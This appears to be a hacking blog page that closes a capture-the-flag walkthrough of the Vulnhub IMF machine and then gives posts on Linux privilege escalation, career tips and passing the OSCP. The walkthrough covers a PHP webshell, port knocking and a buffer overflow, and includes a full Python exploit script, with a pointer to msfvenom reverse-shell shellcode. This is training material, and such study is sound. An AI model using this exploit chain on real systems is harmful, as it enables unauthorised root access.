<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLtCq6H-isYSN0f7gO1CATMRKpNh8BCldIVoKBQgVXW_m-n0G-PTeqCQhjmMws4k9zScztDga3Nhak06MDzO8c5KTZ6dbV2dQLW96pnWnqAjYyVN3L1YmTyECtfQER62AbobXVLUY0n9_-/s1600/phpinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLtCq6H-isYSN0f7gO1CATMRKpNh8BCldIVoKBQgVXW_m-n0G-PTeqCQhjmMws4k9zScztDga3Nhak06MDzO8c5KTZ6dbV2dQLW96pnWnqAjYyVN3L1YmTyECtfQER62AbobXVLUY0n9_-/s320/phpinfo.png" width="320" /></a></div>
<br />
<br />
HAHAHAHA FINALLY! I can cat the fifth flag and move forward...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIe4UJffrDuSSO_QQeN3BFINFJtVaht_k0tWSJ6TKOJZS1ooO5feBqjfRsZw2LdwHwqDlDtzmrutzF5I7wD0EtUQguk5ooC0qkmQl4phOJokV51RLD0UUCZtjKlTj5U8bPsINrwsCBZStE/s1600/flag5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIe4UJffrDuSSO_QQeN3BFINFJtVaht_k0tWSJ6TKOJZS1ooO5feBqjfRsZw2LdwHwqDlDtzmrutzF5I7wD0EtUQguk5ooC0qkmQl4phOJokV51RLD0UUCZtjKlTj5U8bPsINrwsCBZStE/s320/flag5.png" width="320" /></a></div>
The fifth flag reveals the phrase 'agentservices'. Hmmm.... after perusing the box for a bit, I found ssh listening on port 22 and an unknown service listening on port 7788. (I found out later that the 'agent services' was referring to the .htaccess file that allows us to execute PHP from a .gif.) I also found /usr/local/bin/agent and /usr/local/bin/access_codes while looking for files related to 'agent' on the machine. /usr/local/bin/agent turns out to be an ELF executable and the access_codes file says 'SYN 7482,8279,9467', which looks like a port-knocking sequence to me.<br />
<br />
I am able to port knock the machine using nmap (a SYN to each of the three ports, in that order) and then I can simply nc to the machine on port 7788 and the service is now available! So, from our PHP webshell I can 'cat' the contents of the 'agent' executable, but I need to find out what the Agent ID means.<br />
<br />
First I copy the agent executable back to my local workstation and run strings; nothing jumps out about the Agent ID, but I can see there are menu options that include Extraction Points, Request Extraction, and Submitting a Report. In addition, there are numerous cities and places, I'm assuming, to request an extraction from.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7WZ2wn__5NQHVUkdUorxN9l-cb6jfQ6IxnUZI11mzLPs2ieINsWae5VvjT_PE-PSUQ966jfKb2e-gjdKMPn4ouyEq4fMHcmLPKO0AxfLGKGTNreVxI5pBXhaNSqKXgnF5FrnPfXTqsPjF/s1600/agent_dump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7WZ2wn__5NQHVUkdUorxN9l-cb6jfQ6IxnUZI11mzLPs2ieINsWae5VvjT_PE-PSUQ966jfKb2e-gjdKMPn4ouyEq4fMHcmLPKO0AxfLGKGTNreVxI5pBXhaNSqKXgnF5FrnPfXTqsPjF/s320/agent_dump.png" width="320" /></a></div>
<br />
After running into some issues and wanting a more robust shell, I generated an msfvenom payload, executed it via the PHP backdoor shell, and now have a Meterpreter session on the machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtkk4LEXFCvlM8Hvo1bVQax_L0HVbUDre6-CnIkUysm3Qp1XzD-3RXHmzt82LAzz6cQcG5Ho3RlielatR6RsLMgvlnSQYQY3UbRQ2GlT_87hzMDRMZtecQZEbptLgyqcOgGI43VoKBiaTr/s1600/meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtkk4LEXFCvlM8Hvo1bVQax_L0HVbUDre6-CnIkUysm3Qp1XzD-3RXHmzt82LAzz6cQcG5Ho3RlielatR6RsLMgvlnSQYQY3UbRQ2GlT_87hzMDRMZtecQZEbptLgyqcOgGI43VoKBiaTr/s320/meterpreter.png" width="320" /></a></div>
<br />
Finally, I am able to run ltrace on the agent executable and we can easily see the 'strncmp' call made with my provided value 'a' and the actual value needed, '48093572'. ltrace prints every library call with its arguments, so a hard-coded secret that the program compares with strncmp is handed to us in plain text.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDSCOE7UcpRdPRMFgTdQTBHatNseG_Cl3UwYkwPO1LRhRsmTFuYgyfCA-p4RmsilPLALog3AbDr02gGcIu-Wjv7V_z0d-IY4CIanQkGJwAolPLAJwIm4GeArzEL-JgZe5GD3o_B0xTyzwg/s1600/ltrace.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDSCOE7UcpRdPRMFgTdQTBHatNseG_Cl3UwYkwPO1LRhRsmTFuYgyfCA-p4RmsilPLALog3AbDr02gGcIu-Wjv7V_z0d-IY4CIanQkGJwAolPLAJwIm4GeArzEL-JgZe5GD3o_B0xTyzwg/s320/ltrace.png" width="320" /></a></div>
<br />
Ok, now it looks like we have access to this executable, and from our previous recon on the box we know it is running as root, so I think it's time to design a BUFFER OVERFLOW!!! *epic music*<br />
<br />
So after a little fuzzing, I found that the Report (option 3) can be corrupted with a string of 1024 "\x90"s, so now I need to find where in the buffer EIP gets overwritten. To do this we can use pattern_create.rb to generate a non-repeating pattern, send it, read the value EIP holds at the crash, and feed that value to pattern_offset.rb; the offset is 168 bytes into the buffer. To confirm this, we set bytes 168-171 (inclusive) to a unique value and, when the program crashes, we should see exactly those bytes in EIP.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyc_ELOcZaZcQpY1r4mdhGhSHEWw-Ar8-j_CVrimEkq35CUPHJy0H1UdY7EdaeuhDdMU50HZQyBQWkW98X5DQw3HbDyVBzXiVj56cYHW1PotPl_AIYa5i6kvMyXb8x3PnRokYmhJcdeWQh/s1600/buffer_overflow_AB_string.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyc_ELOcZaZcQpY1r4mdhGhSHEWw-Ar8-j_CVrimEkq35CUPHJy0H1UdY7EdaeuhDdMU50HZQyBQWkW98X5DQw3HbDyVBzXiVj56cYHW1PotPl_AIYa5i6kvMyXb8x3PnRokYmhJcdeWQh/s320/buffer_overflow_AB_string.png" width="320" /></a></div>
<br />
Now that we've confirmed we can write to EIP, let's see which registers are also affected. It looks like eax is holding a pointer to data that was overwritten by our pattern, so let's investigate that more thoroughly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-e3KoenCT2bkqz-Z4EgsXxBgguXRVl3ubC4clMdeOajgFxsj16R7FP9XIMM1OoG6oOEhirZqWYx5sSjdq36DXOI2H4VKZ9jF2b5gGoMjOR5eLEsOrbRFEl08DYfeK14fEUTw-qScD0eBH/s1600/eax_register_find_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-e3KoenCT2bkqz-Z4EgsXxBgguXRVl3ubC4clMdeOajgFxsj16R7FP9XIMM1OoG6oOEhirZqWYx5sSjdq36DXOI2H4VKZ9jF2b5gGoMjOR5eLEsOrbRFEl08DYfeK14fEUTw-qScD0eBH/s320/eax_register_find_pattern.png" width="320" /></a></div>
<br />
So again, we used pattern_create.rb to create a pattern and put it into the application, and then we use pattern_offset.rb on the bytes eax points at to calculate where in our buffer that pointer lands. Which is....<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXLEcYvRLlJ4p2W7O4epID8ji7EdVzZ8BnluonLwoXQpiErwUNS26gUP6tBgf0fPYDKSCg0xh60IWJfZHZZ0HHsHEOm7dq-2VHmR74eDiOvvsuE8_Nl2BcDTx5rmBcJwSQeAOhtpLB1iGk/s1600/eax_offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXLEcYvRLlJ4p2W7O4epID8ji7EdVzZ8BnluonLwoXQpiErwUNS26gUP6tBgf0fPYDKSCg0xh60IWJfZHZZ0HHsHEOm7dq-2VHmR74eDiOvvsuE8_Nl2BcDTx5rmBcJwSQeAOhtpLB1iGk/s320/eax_offset.png" width="320" /></a></div>
<br />
...offset 0? That seems awfully nice: eax points at the very start of our buffer, so whatever we place first is what eax points to. Now I need some way to redirect execution to eax. Fortunately, there is a site called ropshell that you can upload a binary to and it will give you back some options, including one for 'call eax' located at offset 0x00000563. You need a little more computer architecture knowledge to know that this will be located at 0x08048563 in memory: 32-bit, non-PIE Linux executables are mapped at base address 0x08048000, so with the usual layout file offset 0x563 ends up at 0x08048563 (readelf -l on the binary, or the process's maps file under /proc, confirms the mapping). Lastly, we just need shellcode, which is easily generated by msfvenom. Now we have the exploit!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTvOKB1T307KK7jxTmJ2_oauHpzgt6BJHmm5nEeEwFMHS8IRYUh4rAjsh6H-WXe8GEFPBDG04nxRDLFi9_HnxjKVf791nw8SxhULW-Jia7J8DjpyA6jRywNwaI6-NkbNAn7n1uaVxKZa3D/s1600/imf_exploit_py.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTvOKB1T307KK7jxTmJ2_oauHpzgt6BJHmm5nEeEwFMHS8IRYUh4rAjsh6H-WXe8GEFPBDG04nxRDLFi9_HnxjKVf791nw8SxhULW-Jia7J8DjpyA6jRywNwaI6-NkbNAn7n1uaVxKZa3D/s320/imf_exploit_py.png" width="320" /></a></div>
<br />
Let's try and see if it works! This specific script didn't work, but the format stayed the same. I had to add some time delays (so the service reads each menu answer before the next one arrives) and I switched from Meterpreter shellcode to plain shellcode. Here is the actual script that worked, followed by my root privs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4rubTyzSqlAGqeL8owxuN5wGxth-UoOt0AjBhA2sO34XARO1gyYcqJQ6qMtvL2hVypXdYtQoB1kOSHQG7jXIIgGMQTYnz_5Coo5m35Kw4HL8hMFvGSskGy_oRCSlG6bYUKBvoYU9el0dN/s1600/actual_imf_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4rubTyzSqlAGqeL8owxuN5wGxth-UoOt0AjBhA2sO34XARO1gyYcqJQ6qMtvL2hVypXdYtQoB1kOSHQG7jXIIgGMQTYnz_5Coo5m35Kw4HL8hMFvGSskGy_oRCSlG6bYUKBvoYU9el0dN/s320/actual_imf_exploit.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5KPTZrcrp8ksPf0gISfw0KsMyl9yB4h45fHiH5VfFLw33IPjZWMAoeOuDQin2B0do-oVXfYzBnRS0zWrG5YnTDf04Oedh4KjSTbXAVdhnGE3cozqHx7jvJtHgyTHuMC6cDc3YbPA7neSP/s1600/got_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5KPTZrcrp8ksPf0gISfw0KsMyl9yB4h45fHiH5VfFLw33IPjZWMAoeOuDQin2B0do-oVXfYzBnRS0zWrG5YnTDf04Oedh4KjSTbXAVdhnGE3cozqHx7jvJtHgyTHuMC6cDc3YbPA7neSP/s320/got_root.png" width="320" /></a></div>
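The port-knocking step and the overflow come together in the script, so here is an added example of my own (not the author's script from the screenshots) that builds the same exploit from parts that can be checked without the target: a pattern generator and offset finder matching what pattern_create.rb and pattern_offset.rb do, a parser for the access_codes line, the payload layout (shellcode at offset 0 where eax points, NOP padding up to offset 168, then the 'call eax' address 0x08048563), and the knock-then-connect sequence. The knock list, port 7788, Agent ID 48093572 and menu option 3 are taken from the walkthrough; the prompt-and-sleep handling in exploit(), the bad-byte assumptions (0x0a and 0x00) and the int3 placeholder shellcode are my assumptions.<br />

```python
import socket
import string
import struct
import time

# Added example, not the author's script. The pure helpers (pattern, offset,
# payload layout, knock-list parsing) are checkable offline; knock() and
# exploit() need the target. Values taken from the post: knock list
# "SYN 7482,8279,9467", service port 7788, Agent ID 48093572, Report is option 3,
# EIP at offset 168, eax pointing at offset 0, 'call eax' at 0x08048563.
# The prompt/sleep flow in exploit() and the bad-byte list are assumptions.


def pattern_create(length: int) -> bytes:
    """Same sequence as Metasploit's pattern_create.rb: Aa0Aa1...Aa9Ab0...
    (20280 bytes before it repeats)."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length: int = 20280) -> int:
    """value: the 4 bytes from the crash, or the EIP integer gdb prints (little-endian).
    Returns the offset into the pattern, or -1 if the register was not overwritten by it."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return pattern_create(length).find(value)


def parse_access_codes(text: str) -> list:
    """'SYN 7482,8279,9467' -> [7482, 8279, 9467]"""
    kind, _, ports = text.strip().partition(" ")
    if kind.upper() != "SYN":
        raise ValueError("unsupported knock type: %r" % kind)
    return [int(p) for p in ports.split(",")]


def build_report(shellcode: bytes, eip_offset: int = 168, call_eax: int = 0x08048563) -> bytes:
    """Layout: shellcode first (eax points at offset 0), NOP padding up to the saved
    return address, then the 'call eax' gadget. The report is read as a line, so a
    0x0a would cut it short; a 0x00 likely would too if it is copied as a C string."""
    if len(shellcode) > eip_offset:
        raise ValueError("shellcode (%d bytes) must fit in the %d bytes before EIP"
                         % (len(shellcode), eip_offset))
    payload = shellcode + b"\x90" * (eip_offset - len(shellcode)) + struct.pack("<I", call_eax)
    if b"\x0a" in payload or b"\x00" in payload:
        raise ValueError("payload contains a newline or NUL byte")
    return payload


def knock(host: str, ports, timeout: float = 0.5) -> None:
    """A plain TCP connect is enough: the kernel sends the SYN whether or not the port answers."""
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                pass
        time.sleep(0.2)


def exploit(host: str, shellcode: bytes, port: int = 7788) -> None:
    """Knock, then answer the agent's prompts one at a time; the sleeps give the
    service time to read each line before the next arrives (assumed prompt flow)."""
    knock(host, parse_access_codes("SYN 7482,8279,9467"))
    with socket.create_connection((host, port)) as s:
        for line in (b"48093572\n", b"3\n", build_report(shellcode) + b"\n"):
            s.recv(4096)          # assumed: the service prompts before each read
            s.send(line)
            time.sleep(0.5)


if __name__ == "__main__":
    eip = 0x41366641              # what gdb would show after sending pattern_create(1024)
    print("EIP offset:", pattern_offset(eip, 1024))
    print("payload length:", len(build_report(b"\xcc" * 16)))
```

For a real run, replace the int3 placeholder with msfvenom output (for example -p linux/x86/shell_reverse_tcp -b '\x00\x0a' -f python), keep it under 168 bytes, and start the listener before calling exploit(). The knock uses connect() rather than nmap; either way only the SYN matters, which is why a closed port and a short timeout are fine.<br />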
<br />
Well, now all that remains is to see the final flag and wrap up this walkthrough! Drum roll please......................<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh68yX_2lpDNp9lUYWM9msbHdr8eJfsRHp8jsnCsTo0v_rHmPPMD1F4IIiMjpkrNOYFOMbLqcprqZmdl2h5s6ybYUhfYsE2DRf5eTjcU6Xz_L7MkaW56t_fTP7EPXEQ6itNeRS7wn4UVO2/s1600/the_end.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh68yX_2lpDNp9lUYWM9msbHdr8eJfsRHp8jsnCsTo0v_rHmPPMD1F4IIiMjpkrNOYFOMbLqcprqZmdl2h5s6ybYUhfYsE2DRf5eTjcU6Xz_L7MkaW56t_fTP7EPXEQ6itNeRS7wn4UVO2/s320/the_end.png" width="320" /></a></div>
<br />
This was an awesome exercise and I'd like to give credit to all the websites I used while researching how to exploit this box. I'd also like to say I compared my walkthrough to the other walkthroughs already posted on Vulnhub.com and it was very fun to see alternate and similar techniques used. All thoughts and comments are the author's and do not represent the thoughts or comments of anyone else. I hope you enjoyed this walkthrough! -Hack Responsibly. Hack Professionally.<br />
<br />Austin<br />
<br />
Getting to the root@hostname:~# of the problem (posted 2016-10-29)<br />
<br />
What is privilege escalation?<br />
<br />
Let's look at the subject in a less technical fashion first. What does it mean to elevate one's privileges? It's being able to do something that you do not have the privileges for. For example: the wife of a powerful CEO can elevate her privileges by convincing her husband to do something for her that she normally couldn't do. This could be money, power, valuable items, etc.<br />
<br />
In terms of hacking or computer security (two sides of the same coin) we either need a program to execute our own code with higher privileges, or we need to prevent any program from executing user-supplied code at higher privileges than the user, or more specifically the hacker, is allowed.<br />
<br />
Whenever someone asks about or googles for 'linux privilege escalation' there is one blog that everyone cites: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/. This blog post is very thorough and hits on an important point: <b>Enumeration is key</b>. You only need one avenue by which to raise your privileges, and there are many, many different ways to do so.<br />
<br />
I recommend going through g0tmi1k's blog and understanding what each command does and how it can be used for privilege escalation. Once you understand the methodology, there are a few things I personally recommend when attempting to escalate your privileges.<br />
<br />
<ol>
<li>'sudo su root' - This is by far the easiest privilege escalation I've ever seen: when the user you land on has sudo privileges, you simply use them to switch to the root user and boom! You're root. Run 'sudo -l' first; it lists exactly what the user may run, and as whom.</li>
<li>Cracking the root password. If you don't believe random passwords are used for root accounts, then a user set the root password and it can potentially be brute forced. However, this is obnoxiously noisy, just for your reference.</li>
<li>Use the Linux Exploit Suggester, included in Kali Linux, to find candidate exploits based on the kernel version. https://github.com/PenturaLabs/Linux_Exploit_Suggester</li>
<li>Use linuxprivchecker, which automates g0tmi1k's enumeration process and suggests potential exploits. https://www.securitysift.com/download/linuxprivchecker.py</li>
</ol>
Lastly, the difference between a script kiddie and a professional hacker is the depth of understanding of these scripts, methodologies, and privilege escalation exploits. If one doesn't work on a kernel it says it should work with, learn why.<br />
<br />
Hack Responsibly. Hack Professionally.<br />
<br />
Austin<br />
<br />
prof_dev5.sh (posted 2016-10-14)<br />
<br />
#!/bin/bash<br />
<br />
echo "Make a plan for your Professional Development!"<br />
echo ""<br />
echo "Anything worthwhile rarely succeeds without proper planning; why should your career and professional development be any different? The first step to developing a great plan is to establish a baseline. Where are you currently? What do you have? Skills, knowledge, abilities, connections, and anything else you can enumerate."<br />
echo ""<br />
echo "The next step is to figure out where you want to be. Where do you see yourself in 1, 5, 10 years? Don't think of where you should be, or where you ought to be, or where you have always thought you would be. Think of your wildest, craziest passion and strive for it. This is where you want to be."<br />
echo ""<br />
echo "These dreams may change and that is OK; it is OK to change what you want at different points in your life. What should not change is your drive to achieve your passion, no matter what it is."<br />
echo ""<br />
echo "Lastly, we connect the current dots with the future dots with specific, concrete, implementable steps. Some steps could be as simple as a flick of a switch or throwing away an old picture. At the other extreme, some decisions can be life altering, such as quitting your job, selling your home, or moving across the country. No decision should be made lightly but, just because they are difficult doesn't mean they are bad decisions. You will never be happier than when you are pursuing and accomplishing your passion!"<br />
echo ""<br />
echo "So how can you connect the dots? How can you plan for your success? The steps are simple but, the change can and will. be. hard. Embrace it and strive for your passion."<br />
echo ""<br />
<div>
echo "Think about your plan this weekend and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />Austin<br />
<br />
prof_dev4.sh (posted 2016-10-13)<br />
<br />
#!/bin/bash<br />
<br />
echo "Humility is a top quality"<br />
echo ""<br />
echo "No individual knows everything and there is a 100% chance that we have said, and will say, something wrong, incorrect, or abrasive to someone else. In that moment, remember humility."<br />
echo ""<br />
echo "It is OK to be wrong and make mistakes both professionally and personally and in fact, we can use them to our advantage when we admit that we were wrong. As Dale Carnegie says in his book, 'If you are wrong, admit it quickly and emphatically'."<br />
echo ""<br />
echo "For some reason, some people refuse to admit they were wrong. They refuse to admit they are wrong about reports, wages, resumes, and big and small decisions alike. In my experience, the damage comes from hiding, re-framing, or ignoring mistakes; the damage does not come exclusively from making mistakes."<br />
echo ""<br />
echo "You should always strive to be better, make fewer mistakes, and accept responsibility for the mistakes you do make. No matter which mistakes you make, admit you were wrong and be better in the future."<br />
echo ""<br />
echo "Embrace your humility and accept responsibility for your mistakes and definitely your successes!"<br />
echo ""<br />
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />Austin<br />
<br />
prof_dev3.sh (posted 2016-10-12)<br />
<br />
#!/bin/bash<br />
<br />
echo 'What is in a name?'<br />
echo ""<br />
echo "Interestingly enough, EVERYTHING! People love hearing their own names. It's a sweet note in their ears, soft touch on their skin, and a warm bite of food in their mouths. Everyone loves to hear their own name."<br />
echo ""<br />
echo "Make a genuine effort to remember people's names when you meet them because it can and will pay dividends 100x over in the future. Clients will warm up to you faster if you greet them after a week by saying \"Hey John, how was the weekend with the in-laws?\" rather than \"Hello again, let's jump into business\"."<br />
echo ""<br />
echo 'When I first learned this trick, I struggled to use it because I thought it was ridiculous. I thought that people would either like you or not like you and that was just the hand you were dealt. Eventually, I combined remembering names with smiling and it was incredible how many MORE people seemed to be genuinely pleased to see me.'<br />
echo ""<br />
echo "This is not a panacea for the jackasses, the jerks, or the rudest people; everyone has to deal with their reputation. This is also not foolproof, not everyone will like you and that is OK. This tip is meant to increase and build upon your desire to develop professionally."<br />
echo ""<br />
echo 'Use this tip regularly until it becomes second nature and watch the scales slowly tip in your favor when meeting and remembering new people, clients, supervisors, investors, friends, or anyone else.'<br />
echo ""<br />
echo "In conclusion, the simple act of remembering names will help you in the future. I can't tell you how, where, or to what end but, I would not doubt for a second its usefulness."<br />
echo ""<br />
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-78126602002668364492016-10-11T07:00:00.000-04:002016-10-11T07:00:03.892-04:00prof_dev2.sh#!/bin/bash<br />
<br />
echo 'Three Meeting "Hacks"'<br />
echo ""<br />
echo 'I was lucky enough to participate in a meetings course recently, and there were three main points I took away from it.'<br />
echo ""<br />
echo 'Main point 1: Every meeting needs an agenda'<br />
echo 'Main point 2: Every meeting needs an outcome or decision'<br />
echo 'Main point 3: Every meeting needs a parking lot'<br />
echo ""<br />
echo 'Every meeting needs an agenda so both the attendees and the meeting host know how the meeting should be progressing. In addition, it helps keeps everyone accountable for the initial time table set for the meeting.'<br />
echo ""<br />
echo 'Every meeting needs an outcome or a decision to be made; otherwise, why else would you have a meeting? This outcome or decision can be as simple as "Everyone is informed of a new product" or as complicated as "We will decide on the number of hours, pay rate, and quantity of interns for the next 7 years". This is also how anyone can determine the success or failure of a meeting.'<br />
echo ""<br />
echo "Lastly, every meeting needs a parking lot. A parking lot is a separate place (paper, whiteboard, notebook, etc.) for ideas that aren't directly relevant to the meeting but shouldn't be forgotten. For example, if you are talking about the budget in a meeting and an idea for a company picnic comes up, put that idea in the parking lot. This keeps the meeting on topic and allows everyone's ideas to be heard. Don't underestimate the effectiveness of this idea!"<br />
echo ""<br />
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"</div>
<div>
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-80190126347504986142016-10-10T14:54:00.000-04:002016-10-10T14:57:42.662-04:00prof_dev1.sh#!/bin/bash<br />
<div>
<br /></div>
<div>
echo "The best way to win arguments, is to avoid them."<br />
echo ""</div>
<div>
echo "One thing I see A LOT is arguments where people are just shouting at each other. Sometimes they have differing opinions, and they should be discussing them, and other times they are just yelling to be heard."<br />
echo ""</div>
<div>
echo "Everybody wants to be heard."<br />
echo ""</div>
<div>
echo "If an argument is unstructured, aggressive, switching from non-personal to personal attacks, or downright silly, see if you can't isolate who is trying to be heard in this argument and what they are trying to have heard."<br />
echo ""</div>
<div>
echo "Quoting <i>How To Win Friends &amp; Influence People</i>, which in turn quotes Benjamin Franklin: \"If you argue and rankle and contradict, you may achieve a victory sometimes; but it will be an empty victory because you will never get your opponent's good will.\""</div>
<div>
echo ""</div>
<div>
echo "Look for ways to agree, hear your opponent, acknowledge what they are saying but, most importantly, avoid arguments in the first place."</div>
<div>
echo ""</div>
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-79394297415038326002016-10-10T14:53:00.000-04:002016-10-10T14:56:54.364-04:00Shell Scripting Professional Development TipsGood afternoon everyone,<br />
<div>
<br /></div>
<div>
This week I decided to release a daily shell script/blog post with a professional development tip. The idea is that you can read the blog post here, or copy the text and run it as a shell script on your Linux distro as a reminder. Set it as a cron job or run it when you need it. Show it to your friends and coworkers! </div>
<div>
<br /></div>
<div>
I will be releasing the first one today immediately after posting this and they follow the naming pattern of prof_dev{number}.sh. Enjoy all week long and check back often to see updates!</div>
<div>
<br /></div>
<div>
-Hack Responsibly, Hack Professionally</div>
Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-66932782290185093172016-10-06T21:11:00.001-04:002016-10-06T21:11:20.196-04:00My OSCP StoryGood evening,<br />
<br />
I'm going to deviate from my normal professional development and technical discussions to talk about an accomplishment I'm rather proud of, I passed the OSCP test! For those of you who don't know what OSCP is, check out the website here: https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/<br />
<br />
First I want to say that this blog post is completely my own opinion and does not reflect the views of any past, present, or future employers, nor does it represent the views of the Offensive Security team.<br />
<br />
I started the course, Penetration Testing with Kali Linux (or PWK), at the end of July with 60 days of lab access. I think, given my background, this was sufficient time, but the amount of time you should purchase DEFINITELY depends on your background. Do not let the price tag fool you: the extra time you spend studying and learning will definitely help you pass the exam. The lab is full of machines with many different configurations, operating systems, and vulnerabilities that you, as the student, need to figure out how to exploit. Some exploits will land you a root shell immediately and some will only land you a low-privilege shell. If you have a low-privilege shell then you need to escalate your privileges to root (Linux) or Administrator (Windows).<br />
<br />
There are something like 50 virtual machines in this practice lab and the learning opportunities are figuratively unlimited; there is typically more than one way to exploit most systems. Rumor has it that if you are able to exploit every box in the public network (there are other hidden networks) except for Pain, Sufferance, and Humble then you're good to go for the exam, BUT there is no proof of this and the amount of learning required to pass the exam is different for everyone.<br />
<br />
The exam consists of 5 boxes of varying point values, and students need 70/100 points to pass. So now I'll give my experience with the labs and exam.<br />
<br />
My PERSONAL experience with the labs was awesome. I loved exploiting every single box, and with every successful exploit I felt like I understood the process, the exploits, and the methodology just slightly better. I think I ended up exploiting around 30-35 of the available boxes (life got in the way of the rest of them), but the most important thing for me was to understand the methodology. I really started to understand how Remote File Inclusion/Local File Inclusion (RFI/LFI) exploits were used, and what to look for in privilege escalation. I became more familiar with Metasploit. I was able to understand and modify exploits for my own use when necessary. These and other skills are explained in the course material, but it's up to you to take those examples, do them, understand them, experiment with them, and master them so they can be used in the lab and on the exam. I can't believe it took this long to mention it, but you will learn to "Try Harder" in this course. One common misconception, in my opinion, is that the course material is everything you need to pass the exam. This is both true and not true. It is true that you have every tool you need to exploit any machine. It is not true that you know how to use each and every tool exactly as necessary to exploit any machine. When you are frustrated and angry and all the admins will say is "Try Harder", take it to heart and try harder. You will be so glad you did.<br />
<br />
